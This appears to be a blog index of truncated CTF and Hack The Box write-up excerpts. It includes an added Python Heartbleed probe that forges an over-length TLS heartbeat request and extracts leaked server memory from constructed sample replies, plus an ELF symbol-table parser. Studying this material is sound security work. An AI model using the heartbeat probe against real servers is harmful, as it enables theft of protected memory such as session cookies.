I decided to take a break from Hack The Box and make my trip to OffSec Proving Grounds. Now, OffSec Proving Grounds is nothing special; it just has VulnHub machines hosted. One thing is that it is convenient that you don't have to download and install VMs, which in my case is a pain (I have low storage lel). Cyber Sploit was perhaps one of the easiest boxes I have ever done. I rooted the box in a little under 15 minutes, so it was indeed a nice warm-up.
One thing which I did not like…
This is a notes-like write-up I am posting about the HTB boxes I managed to compromise by myself. Preparing for "a certain" course, these kinds of boxes are really helpful in getting experience. Let's jump in!
This box is all about deep website enumeration and finding the correct CVE. We start off having very little information about any of the services running on the box; gradually enumerating almost everything and piecing together vital pieces of information, we finally get a foothold. The funny thing is, the foothold itself is root, so there is no need for lateral movement or privilege escalation (yeet!)
So, I managed to solve the retired Valentine box from Hack The Box and decided to write a write-up about it. You can always return to your write-up if you forget something; it's like note-taking! Let's begin!
The box teaches us how to detect and exploit the "Heartbleed" vulnerability (CVE-2014-0160), a serious bug in the popular OpenSSL cryptographic software library. A missing bounds check in OpenSSL's TLS heartbeat extension lets a client read up to 64 KB of the server's process memory per request, so this weakness allows stealing information that is, under normal conditions, protected by the SSL/TLS encryption used to secure the Internet. More on that on this site. We get a weird-looking hex string which actually is the…
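The probe behind that detection, as an added example that is not part of the original write-up: a TLS heartbeat request whose length field lies, and a classifier that decides from the reply whether the server copied memory it should not have. The sample replies are constructed here so the code runs offline; a real probe would send a ClientHello, wait for ServerHelloDone and then write `build_heartbeat_request()` to the socket (nmap's `ssl-heartbleed` script automates exactly this). The fake session cookie in `FAKE_HEAP` is invented for the example.

```python
import struct

# TLS record / heartbeat constants (RFC 5246, RFC 6520)
CONTENT_ALERT = 0x15
CONTENT_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 0x01, 0x02
TLS_VERSION = b"\x03\x02"  # TLS 1.1; any version the server accepts works


def build_heartbeat_request(claimed_len: int, payload: bytes = b"") -> bytes:
    """Heartbeat request whose payload_length field claims `claimed_len` bytes
    while only len(payload) bytes are actually sent.  Unpatched OpenSSL trusts
    the claimed length and copies that many bytes back (CVE-2014-0160); a fixed
    server drops any request whose claimed length does not fit the record."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload
    return struct.pack("!B2sH", CONTENT_HEARTBEAT, TLS_VERSION, len(body)) + body


def leaked_memory(reply: bytes, sent_payload: bytes) -> bytes:
    """Bytes the server echoed beyond what we sent, i.e. disclosed process memory.
    Returns b'' when the reply is not a heartbeat response or echoes nothing extra."""
    if len(reply) < 5 or reply[0] != CONTENT_HEARTBEAT:
        return b""
    rlen = struct.unpack("!H", reply[3:5])[0]
    body = reply[5:5 + rlen]
    if len(body) < 3 or body[0] != HB_RESPONSE:
        return b""
    echoed_len = struct.unpack("!H", body[1:3])[0]
    return body[3:3 + echoed_len][len(sent_payload):]


def classify_reply(reply: bytes, sent_payload: bytes) -> str:
    """'vulnerable' if the server echoed more than it was given, 'patched' if it
    stayed silent or answered with an alert, 'unknown' for anything else."""
    if leaked_memory(reply, sent_payload):
        return "vulnerable"
    if not reply or reply[0] == CONTENT_ALERT:
        return "patched"
    return "unknown"


def hexdump(data: bytes, width: int = 16) -> str:
    """Render leaked bytes the way the classic PoC prints them."""
    lines = []
    for i in range(0, len(data), width):
        chunk = data[i:i + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{i:04x}  {hexpart:<{width * 3}} {asc}")
    return "\n".join(lines)


# --- constructed sample traffic (no real server involved) -------------------
PROBE = build_heartbeat_request(0x4000)  # claims 16 KB, sends 0 bytes of payload

# What an unpatched server answers: a heartbeat response whose payload is heap
# memory.  Shortened to a few dozen bytes instead of the 16 KB a real server
# returns; the fake cookie stands in for whatever happened to be on the heap.
FAKE_HEAP = b"\x00\x17\x03\x02Cookie: session=constructed-sample-value\x00\x00"
_vuln_body = struct.pack("!BH", HB_RESPONSE, len(FAKE_HEAP)) + FAKE_HEAP + b"\x00" * 16  # + 16 B padding
VULNERABLE_REPLY = struct.pack("!B2sH", CONTENT_HEARTBEAT, TLS_VERSION, len(_vuln_body)) + _vuln_body

# Patched OpenSSL silently discards the request; other stacks may send a fatal
# unexpected_message alert (level 2, description 10).  Both mean "not vulnerable".
SILENT_REPLY = b""
ALERT_REPLY = struct.pack("!B2sH", CONTENT_ALERT, TLS_VERSION, 2) + b"\x02\x0a"

if __name__ == "__main__":
    for label, reply in [("vulnerable host", VULNERABLE_REPLY),
                         ("patched host", SILENT_REPLY),
                         ("alerting host", ALERT_REPLY)]:
        print(label, "->", classify_reply(reply, b""))
    print(hexdump(leaked_memory(VULNERABLE_REPLY, b"")))
```

The decisive check is `len(echoed) > len(sent_payload)`: a correct server can only echo what it was given, so any extra byte is memory it should never have disclosed. On the real box that extra memory is where the hex string the write-up goes on to decode turns up.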
A week back, one of my seniors published a series of three CTF challenges from Cryptography, Reversing and Forensics. This write up focuses on the Reversing challenge.
I always like to perform some easy tests on the binary which can be an easy win or at least give insight into what's going on inside, without having to delve deeper for now.
I ran the file command to see information about the binary; it displayed the following:
One thing I noticed is that the binary is "not stripped" (its symbol table is still present), which means we can debug it easily and disassemble the functions…
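What `file` is actually testing when it prints "not stripped", as an added example that is not the post's code: it looks for a `.symtab` section, and that section is what lets `nm` and gdb name functions. The script below parses the ELF64 section headers itself and lists the function symbols. Because the challenge binary is not on this page, it builds a constructed fixture (a tiny object with two invented functions, `main` and `check_flag`) and can generate a stripped twin of it; pass a path on the command line to run it against a real file instead.

```python
import struct
import sys

SHT_NULL, SHT_PROGBITS, SHT_SYMTAB, SHT_STRTAB = 0, 1, 2, 3
STT_FUNC = 2
EHDR = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr (little-endian), 64 bytes
SHDR = "<IIQQQQIIQQ"        # Elf64_Shdr, 64 bytes
SYM = "<IBBHQQ"             # Elf64_Sym, 24 bytes
EHDR_SIZE, SHDR_SIZE, SYM_SIZE = 64, 64, 24


def read_sections(elf: bytes) -> list:
    """Section header table as (name, type, offset, size, link, entsize) tuples.
    Only little-endian ELF64 is handled here (the usual CTF case)."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    hdr = struct.unpack(EHDR, elf[:EHDR_SIZE])
    shoff, shentsize, shnum, shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    raw = [struct.unpack(SHDR, elf[shoff + i * shentsize:shoff + (i + 1) * shentsize])
           for i in range(shnum)]
    # sh_name is an offset into the section-name string table (.shstrtab)
    shstr = elf[raw[shstrndx][4]:raw[shstrndx][4] + raw[shstrndx][5]]
    cstr = lambda table, off: table[off:table.index(b"\x00", off)].decode()
    return [(cstr(shstr, s[0]), s[1], s[4], s[5], s[6], s[9]) for s in raw]


def is_stripped(elf: bytes) -> bool:
    """`file` prints "not stripped" when a .symtab section exists; strip(1)
    removes it, and with it every local symbol a disassembler could label."""
    return not any(stype == SHT_SYMTAB for _, stype, *_ in read_sections(elf))


def function_symbols(elf: bytes) -> list:
    """Names of STT_FUNC entries in .symtab, i.e. what `nm` or gdb's
    `disassemble <name>` can resolve.  Empty for a stripped binary."""
    sections = read_sections(elf)
    names = []
    for _, stype, off, size, link, entsize in sections:
        if stype != SHT_SYMTAB:
            continue
        _, _, str_off, str_size, _, _ = sections[link]  # sh_link -> .strtab
        strtab = elf[str_off:str_off + str_size]
        for i in range(size // entsize):
            st_name, st_info, _, _, _, _ = struct.unpack(
                SYM, elf[off + i * entsize:off + (i + 1) * entsize])
            if st_info & 0xF == STT_FUNC:
                names.append(strtab[st_name:strtab.index(b"\x00", st_name)].decode())
    return names


def build_sample_elf(keep_symbols: bool) -> bytes:
    """Constructed fixture: a tiny non-runnable ELF64 object with a .text section
    and, if keep_symbols, a .symtab/.strtab naming two invented functions."""
    text = b"\xc3" * 8                                  # eight RET instructions
    strtab = b"\x00main\x00check_flag\x00"              # names at offsets 1 and 6
    symtab = struct.pack(SYM, 0, 0, 0, 0, 0, 0)          # mandatory null symbol
    symtab += struct.pack(SYM, 1, 0x12, 0, 1, 0, 4)      # main: GLOBAL|FUNC in section 1
    symtab += struct.pack(SYM, 6, 0x12, 0, 1, 4, 4)      # check_flag
    shstrtab = b"\x00.text\x00.symtab\x00.strtab\x00.shstrtab\x00"
    blobs = [(b".text", SHT_PROGBITS, text, 0, 0, 0)]   # (name, type, data, link, info, entsize)
    if keep_symbols:                                     # .symtab's sh_link = index of .strtab (3)
        blobs += [(b".symtab", SHT_SYMTAB, symtab, 3, 1, SYM_SIZE),
                  (b".strtab", SHT_STRTAB, strtab, 0, 0, 0)]
    blobs.append((b".shstrtab", SHT_STRTAB, shstrtab, 0, 0, 0))
    shdrs, body, offset = [struct.pack(SHDR, *([0] * 10))], b"", EHDR_SIZE
    for name, stype, data, link, info, entsize in blobs:
        shdrs.append(struct.pack(SHDR, shstrtab.index(name), stype, 0, 0,
                                 offset, len(data), link, info, 1, entsize))
        body, offset = body + data, offset + len(data)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, LE, version 1
    ehdr = struct.pack(EHDR, ident, 1, 0x3E, 1, 0, 0, offset, 0, EHDR_SIZE,
                       0, 0, SHDR_SIZE, len(shdrs), len(shdrs) - 1)
    return ehdr + body + b"".join(shdrs)


if __name__ == "__main__":
    elf = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf(True)
    print("stripped" if is_stripped(elf) else "not stripped", function_symbols(elf))
```

Run it with the challenge binary's path as the only argument. Note that stripping only removes `.symtab`; exported symbols needed at load time live in `.dynsym` and survive, which is why a stripped binary still shows its imported libc functions but loses names such as `check_flag`.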
The box was pretty fun, with some rabbit holes that can really frustrate someone (personal experience). Once the vulnerability has been exposed, things do not get easy from there, as the box itself has many protections in it. I am going to show you how I owned this box. So basically, the "http" service running Apache Tomcat was vulnerable to an Apache Struts vulnerability; leveraging that, we get credential information for a user, SSH in and then do a DLL injection privilege escalation to get root.
The first step of enumeration is starting an nmap scan and brute-forcing website directories. For this…